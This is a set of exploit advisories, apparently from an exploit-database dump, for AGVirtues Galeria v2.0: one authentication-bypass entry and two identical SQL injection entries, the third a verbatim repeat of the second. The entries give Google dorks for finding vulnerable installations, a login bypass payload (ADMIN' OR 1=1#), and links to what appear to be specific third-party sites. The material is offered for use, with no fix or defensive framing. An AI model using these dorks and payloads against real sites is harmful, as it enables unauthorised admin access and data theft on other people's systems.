==================================================================================================================================== | # Title : AGVirtues Galeria v2.0 Auth By Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/ | | # Dork : galeria/album.php?id= | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user & pass : ADMIN' OR 1=1# [+] http://wexpomarmorecombr/galeria/admin/album.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== ======================================================================================================= ============================= | # Title : AGVirtues Galeria v2.0 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/ | | # Dork : inurl:galeria/album.php?id= | ======================================================================================================= ============================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /index/galeria/album.php?id= [+] http://wospluralorg/index/galeria/album.php?id= inject her Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== ==================================================================================================================================== | # Title : AGVirtues Galeria v2.0 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) | | # Vendor : https://codecanyon.net/ | | # Dork : inurl:galeria/album.php?id= | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /index/galeria/album.php?id= [+] http://wospluralorg/index/galeria/album.php?id= inject her Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | ===============================================================================